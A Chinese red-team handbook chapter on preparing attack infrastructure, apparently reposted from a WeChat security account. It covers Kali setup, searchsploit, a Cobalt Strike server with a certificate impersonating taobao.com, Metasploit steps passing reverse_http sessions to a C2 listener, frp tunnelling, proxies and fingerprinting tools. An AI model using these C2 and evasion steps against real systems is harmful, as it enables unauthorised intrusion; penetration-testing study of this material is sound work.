兵者,诡道也
我们发布的内容仅作为测试和学习交流,禁止用于未授权场景。任何人不得将其用于非法目的。我方对于阅读本文技术引起的法律责任概不负责。
--->目录<---
0x01——更新源
0x02——(Exploit-DB)漏洞数据库
0x03——cs特性修改
0x04——msf,cs会话互传
0x05——proxychains、burp、software代理
0x06——frp端口转发
0x07——武装google-chrome
0x08——指纹识别
0x09——常规
--->0x001.更新源
sudo vim /etc/apt/sources.list
#kali官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
#中科大的源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
apt-get update 更新索引
apt-get upgrade 更新软件
apt-get dist-upgrade 升级 (不推荐)
apt-get clean 删除缓存包
apt-get autoclean 删除未安装的deb包
--->0x001.更新漏洞数据库
searchsploit -u #更新漏洞数据库
searchsploit -h #查看使用帮助
searchsploit eternalblue -w #联网搜索
--exclude= #排除不想要的结果kali@kali:~$ searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
-p #漏洞利用的完整路径复制到剪贴板
-m #复制exp到当前的工作目录
-t #限制搜索标题 kali@kali:~$ searchsploit -t oracle windows
--disable-colour--disable-color #颜色输出
--->0x002.或者直接官网下
https://www.exploit-db.com/
--->0x001.cs启动
#windows服务端启动,需要jdk11以上
"C:Program FilesJavajdk-11.0.15.1binjava.exe" -jar cat_server.jar 192.168.152.128 123456
#windows客户端启动
"C:Program FilesJavajdk-11.0.15.1binjava.exe" -jar cat_client.jar client
#Linux启动服务端:
1、sudo update-alternatives --config java #切换jdk11以上
2、cd /root/tools/cs4_5/cat_server
3、java -jar cat_server.jar server server 192.168.152.128 123456 jquery-c2.4.5.profile -keytool -keystore cobaltstrike.store
keytool -list -v -keystore cobaltstrike.store #默认密码123456回车。启动CS,C2Profile只是影响后续的操作,不用重启CS
--->0x002.cs证书 (linux keytool)
1、#自定义cobaltstrike.store
keytool -list -v -keystore cobaltstrike.store #默认密码123456
2、#生成新的cobaltstrike.store证书
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
-keystore cobaltstrike.store -storepass 密码
密码
-keyalg RSA
google.com -dname "CN=(名字与姓氏),
OU=(组织单位名称), O=(组织名称),
L=(城市或区域名称),
ST=(州或省份名称),
C=(单位的两字母国家代码)
:
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
发现有多条就删除cobaltstrike.store重新生成 :
keytool -list -v -keystore cobaltstrike.store
--->0x003.cs证书 (Windows keytool)
#先cd到cs服务端所在目录(如果没有配jdk11以上),默认密码:123456
C:toolsCScat_server>"C:Program FilesJavajdk-11.0.15.1binkeytool.exe" -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
--->0x001.msf传cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost ip #CS ip
set lport port #CS 端口
set session 1 #要转发的session
set prependmigrate true #可忽略
set DisablePayloadHandler true #用来禁用payload handler的监听否则有冲突
run/exploit -j
--->0x002.cs传msf
use exploit/multi/handler
set set payload windows/meterpreter/reverse_http
set lhost ip
set lport port
exploit
--->0x001.proxychains socks5代理
vim /etc/proxychains.conf
代理检查
curl ipinfo.io
代理启动*
proxychains firefox
google-chrome --proxy-server="socks5://127.0.0.1:9050"
--->0x002.burp上层代理
--->0x003.终端代理
终端代理:
export http_proxy="socks5://127.0.0.1:9050"
export https_proxy="socks5://127.0.0.1:9050"
# 取消代理
$ unset http_proxy
$ unset https_proxy
--->0x001.配置与启动
服务端启动:
root@kali:~/Desktop/frp# ./frpc -c frpc.ini
#服务端frp配置:
[common]
bind_port = 9070
token = ldsdsd1>lsjewdf@@1
#客户端frp配置:
root@kali:~/Desktop/frp# more frpc.ini
[common]
server_addr = vps
server_port = 9070
token = lauNkus7$21>lsjf!2ds
[s1]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 80
[s2]
type = tcp
local_ip = 127.0.0.1
local_port = 8081
remote_port = 8081
--->0x001.安装与启动
--->0x002.插件
Hack-Tools
OWASP Penetration Testing Kit
Proxy SwitchyOmega #代理
Shodan
Wappalyzer #指纹识别
HackBar
findsomething
--->0x001.kscan
#单个url指纹识别
./kscan_linux_amd64 -t http://www.xxx.com --check -o xxx.xx.xxx.xxx.csv -o保存 --check 指纹
#文件批量指纹识别
./kscan_linux_amd64 -t xxx.xx.xxx.xxx_url.txt --check -o xxx.xx.xxx.xxx.csv
--->0x002.Ehole
1.本地识别:
EHole -l url.txt //URL地址需带上协议,每行一个
2.FOFA识别:
注意:从FOFA识别需要配置FOFA 密钥以及邮箱,在config.ini内配置好密钥以及邮箱即可使用。
EHole -f 192.168.1.1/24 //支持单IP或IP段
3.结果输出:
EHole -l url.txt -json export.json //结果输出至export.json文件
--->0x001.开启ssh
---------------------------------------------------------------------
vi /etc/ssh/sshd_config
PasswordAuthentication yes 取消掉注释
permitrootlogin yes 添加
/etc/init.d/ssh restart 或者 service ssh start 重启ssh
update-rc.d ssh enable 开机启动
---------------------------------------------------------------------
--->0x002.定时任务
直接编辑文件:nano /etc/crontab
crontab -e #编辑定时任务,或者nano /etc/crontab
crontab -l #查看任务列表
crontab -r #删除当前所有定时任务
/etc/init.d/cron start/stop/restart/reload #启动/停止/重启/重新加载 crontab服务
chkconfig --list crond #查看crond是否开机自动启动
chkconfig --level 35 crond on #设置crond开机自动启动
*/4 * * * * root /home/Tool/httpslow/httpslow.sh &#每4分钟执行
#新创建的cron job,不会马上执行,至少要过2分钟才执行。如果重启cron则马上执行。
tail -f /var/log/cron #查看日志
保存:ctrl + x
--->0x003.VM共享文件夹挂载
挂在共享文件夹不显示:1.卸载挂载:sudo umount /mnt/hgf
2.重新挂载(根据uid):sudo /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other -o uid=1000 -o gid=1000 -o umask=022
3.返回/mnt/hgfs中的/mnt目录。再进入/hgfs 即可发现挂载目录
--->0x004.tcpdump抓包
tcpdump -i eth0 -vnn host 10.1.1.45//抓取包含10.1.1.45的数据包 (eth0根据实际情况)
tcpdump -i eth0 -vnn src host 10.1.1.45//抓取源地址是10.1.1.45数据包
tcpdump -i eth0 -vnn dst host 10.1.1.45//抓取目的地址是10.1.1.45数据包
tcpdump -i eth0 -vnn src port 22//抓取源端口是22的数据包
tcpdump -i any -vnn src port 80 //抓任意源端口是80的数据包
tcpdump -i eth0 -vnn dst port 22//抓取目的端口是22的数据包
保存抓完的包
tcpdump -i eth0 -vnn src host 10.1.1.45 //抓取源地址是10.1.1.45数据包
-w 文件a//把抓完的包保存到文件a中
-c 数量//抓数据包的数量
tcpdump –i eth0 -vnn -w /tmp/fil1 -c 100//把抓取的数据包记录存到/tmp/fill文件中,当抓取100个数据包后就退出程序
原文始发于微信公众号(513 Sec):红队手册[1]——准备篇
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论